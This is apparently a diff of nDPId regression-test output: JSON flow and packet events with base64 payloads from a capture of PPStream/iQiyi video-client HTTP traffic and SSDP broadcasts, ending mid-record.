+00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1415,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1467353191521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353191521,"pkt":"TF4M6gNlABxCjnAxCABFAAC4L9RAAIAGTYzAqHMI3xpqFMZPAFCekgJEnvl6klAYQTcvHQAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc2F1dG8uaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG1hc2F1dG9fcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1415,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191521,"flow_last_seen":1467353191521,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191521,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masauto.ini","code":0,"content_type":"","user_agent":"masauto_runxx"}} +01086{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1416,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":1467353191524,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":526,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":526,"pkt_l4_len":492,"thread_ts_msec":1467353191524,"pkt":"ABxCjnAxTF4M6gNlCABFAAIAVHFAADgGb6ffGmoUwKhzCABQxk+e+XqSnpIC1FAYAB\/e1QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMSBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogMTMwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjUwOjIzIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0zNjAwDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45Nw0KWC1DYWNoZTogSElUIGZyb20gMjIzLjI2LjEwNi4yMA0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KW21hc2F1dG9dDQp2PTENCnA9MQ0KZT2xsb6pL8nPuqMvuePW3S\/J7tvaDQpzPb2ty9Uv1eO9rS\/JvbarL7rTxM8NCmFwcD1maWRkbGVyLHdpcmVzaGFyayxIdHRwV2F0Y2gsSHR0cFdhdGNoIFN0dWRpbyxIdHRwQW5hbHl6ZXINCg=="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1417,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191538,"flow_last_seen":1467353191538,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":1,"thread_ts_msec":1467353191538,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1467353191538,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1467353191538,"pkt":"TF4M6gNlABxCjnAxCABFAAD6L9ZAAIAGlfnAqHMIJG7cD8ZNAFCivUMktEgQ8FAY\/\/DARAAAR0VUIC90bXBzdGF0cy5naWY\/bWV0aG9kPXFpdWJpdGVyJm9zPXdpbmRvd3MtNi4xLjc2MDFfc3AxJnV1aWQ9MzUwQzNGMUFDNzVENDBiYzkwRDYwMkRBNEU2N0E3MkQmc29mdHZlcnNpb249MS4wLjAuMSZzb3VyY2U9cHBzJnRhc2t0eXBlPWdldHRhc2tpbmZvIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRSVlpQW5nZW50DQpIb3N0OiBtc2cudmlkZW8ucWl5aS5jb20NCg0K"} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1417,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191538,"flow_last_seen":1467353191538,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":1,"thread_ts_msec":1467353191538,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"msg.video.qiyi.com","url":"msg.video.qiyi.com\/tmpstats.gif?method=qiubiter&os=windows-6.1.7601_sp1&uuid=350C3F1AC75D40bc90D602DA4E67A72D&softversion=1.0.0.1&source=pps&tasktype=gettaskinfo","code":0,"content_type":"","user_agent":"QIYiAngent"}} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1418,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":3,"flow_last_seen":1467353191556,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353191556,"pkt":"TF4M6gNlABxCjnAxCABFAAC5L9hAAIAGTYfAqHMI3xpqFMZPAFCekgLUnvl8alAYQMHSJwAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc3JlY29tLmluaSBIVFRQLzEuMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBtYXNhdXRvX3J1bnh4DQpIb3N0OiBzdGF0aWMucWl5aS5jb20NCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCg=="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1423,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191604,"flow_last_seen":1467353191604,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191604,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1423,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1467353191604,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353191604,"pkt":"TF4M6gNlABxCjnAxCABFAAC4L+lAAIAGTXjAqHMI3xpqE8ZQAFAEnujgm7SOJVAYQTfnOwAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc2Jsb2cuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG1hc2Jsb2dfcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1423,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191604,"flow_last_seen":1467353191604,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191604,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masblog.ini","code":0,"content_type":"","user_agent":"masblog_runxx"}} +00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1424,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":2,"flow_last_seen":1467353191606,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353191606,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5GMJAAC4G\/04kbtwPwKhzCABQxk20SBDwor1D9lAYPLgN5wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjMxIEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +01085{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1467353191608,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":526,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":526,"pkt_l4_len":492,"thread_ts_msec":1467353191608,"pkt":"ABxCjnAxTF4M6gNlCABFAAIApFFAADgGH8jfGmoTwKhzCABQxlCbtI4lBJ7pcFAYAB996wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMSBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogMTMwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjE3OjQzIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0zNjAwDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45Nw0KWC1DYWNoZTogSElUIGZyb20gMjIzLjI2LjEwNi4xOQ0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KW21hc2Jsb2ddDQp2PTENCnA9MQ0KZT2xsb6pL8nPuqMvuePW3S\/J7tvaDQpzPb2ty9Uv1eO9rS\/JvbarL7rTxM8NCmFwcD1maWRkbGVyLHdpcmVzaGFyayxIdHRwV2F0Y2gsSHR0cFdhdGNoIFN0dWRpbyxIdHRwQW5hbHl6ZXINCg=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1427,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191688,"flow_last_seen":1467353191688,"flow_idle_time":7560000,"flow_min_l4_payload_len":550,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":550,"midstream":1,"thread_ts_msec":1467353191688,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01190{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1427,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1467353191688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":604,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":604,"pkt_l4_len":570,"thread_ts_msec":1467353191688,"pkt":"TF4M6gNlABxCjnAxCABFAAJOL\/RAAIAGZxbAqHMIZePIC8ZRAFCkQ4vBOJoXClAY\/\/Dn4QAAR0VUIC9jY3MgSFRUUC8xLjENClVzZXItQWdlbnQ6IENvb2tpZUNsZWFyX3J1bnh4DQpIb3N0OiBhcGkuY3VwaWQuaXFpeWkuY29tDQpDb29raWU6IHBwc19jbGllbnRfdmVyMj01LjIuMTUuMjI0MDsgVDAwNDA0PTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4OyBfcHBzX2l2aT1WazQ5TVRZd05UQTFMYVcvcFBtaFJ6OC9QNlRhcEVlbXVEOC9wTSt3Wmo4dHBMV3gzemd3cGxvL3BHYW9jU1pXVUQweEpsWkRQVDgvUHo4K3BMV3gzemd3cGxvL3BHYW9jU1pXU2owdE1TWldVejFXSmxaRVBTWldWRnRCWFQweU1UYzFKbFpOUFNaV1ZqMDFMakl1TVRVdU1qSTBNQ1pXVlQxb2RIUndPaTh2ZDNkM0xtbHhhWGxwTG1OdmJTOTJYekU1Y25Kc2RuVjRiR2N1YUhSdGJBPT07IFFDMDA2PXU1NDl2cHoxMGw5ZmthdHVtNGFsdzRicDsgUUMwMDg9MTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE0NjY2NDU4MTYuMTsgSG1fbHZ0XzUzYjczNzRhNjNjMzc0ODNlNWRkOTdkNzhkOWJiMzZlPTE0NjY2NDU4MTc7IFFDMDA1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQoNCg=="} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1427,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191688,"flow_last_seen":1467353191688,"flow_idle_time":7560000,"flow_min_l4_payload_len":550,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":550,"midstream":1,"thread_ts_msec":1467353191688,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/ccs","code":0,"content_type":"","user_agent":"CookieClear_runxx"}} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":1467353191722,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":291,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":291,"pkt_l4_len":257,"thread_ts_msec":1467353191722,"pkt":"ABxCjnAxTF4M6gNlCABFAAEVyyVAAC8GHh5l48gLwKhzCABQxlE4mhcKpEON51AYPCgsNwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjMxIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2pzb247IGNoYXJzZXQ9dXRmLTgNCkNvbnRlbnQtTGVuZ3RoOiAxMQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCnsiciI6ZmFsc2V9"} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1430,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1467353192820,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353192820,"pkt":"AQBef\/\/6SNIkYwreCABFAAChDkwAAAER9TTAqAUp7\/\/\/+sTGB2wAjdbrTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1437,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1467353193179,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353193179,"pkt":"AQBef\/\/6jHNut5ODCABFAAChAo0AAAERAQHAqAUc7\/\/\/+up3B2wAjbFHTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1440,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1467353195822,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353195822,"pkt":"AQBef\/\/6SNIkYwreCABFAAChDk8AAAER9THAqAUp7\/\/\/+sTGB2wAjdbrTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1443,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195852,"flow_last_seen":1467353195852,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353195852,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1443,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1467353195852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353195852,"pkt":"TF4M6gNlABxCjnAxCABFAAOkMjBAAIAGuBrAqHMIymwO7MZTAFDqT5aSVlCsgFAYQTeESwAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxOTUwNTQmc2g9JnNxPSZzdz0mdD1zcCZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} -01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195852,"flow_last_seen":1467353195852,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353195852,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353195054&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1444,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195855,"flow_last_seen":1467353195855,"flow_idle_time":7440000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353195855,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00913{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1444,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1467353195855,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":399,"pkt_l4_len":365,"thread_ts_msec":1467353195855,"pkt":"TF4M6gNlABxCjnAxCABFAAGBMjFAAIAGqNHAqHMIe31vRsZUAFDL+rP6wuI4bVAY\/\/CsBQAAR0VUIC9hcGlzL3VyYy9zZXRyYz9ja3VpZD1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZ0dklkPTQ3OTUzMTAwMCZ2aWRlb1BsYXlUaW1lPS0xJmFkZHRpbWU9MTQ2NzM1MzE5NSZ0ZXJtaW5hbElkPTEyJnZUeXBlPTAmY29tPTImcHBzVHZpZFR5cGU9MiZhZ2VudF90eXBlPTMwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRaXlpIExpc3QgQ2xpZW50IFBDIDUuMi4xNS4yMjQwDQpIb3N0OiBubC5yY2QuaXFpeWkuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1444,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195855,"flow_last_seen":1467353195855,"flow_idle_time":7440000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353195855,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"nl.rcd.iqiyi.com","url":"nl.rcd.iqiyi.com\/apis\/urc\/setrc?ckuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&tvId=479531000&videoPlayTime=-1&addtime=1467353195&terminalId=12&vType=0&com=2&ppsTvidType=2&agent_type=30","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1446,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1467353195956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353195956,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5xWxAADMGdMnKbA7swKhzCABQxlNWUKyA6k+aDlAYACCSWwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM1IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00749{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1448,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1467353195998,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1467353195998,"pkt":"ABxCjnAxTF4M6gNlCABFAAEFPIVAAC8G7\/l7fW9GwKhzCABQxlTC4jhty\/q1U1AYPLjA5wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFRlbmdpbmUNCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDY6MDY6MzUgR01UDQpDb250ZW50LVR5cGU6IHRleHQvcGxhaW47Y2hhcnNldD1VVEYtOA0KQ29udGVudC1MZW5ndGg6IDI5DQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3J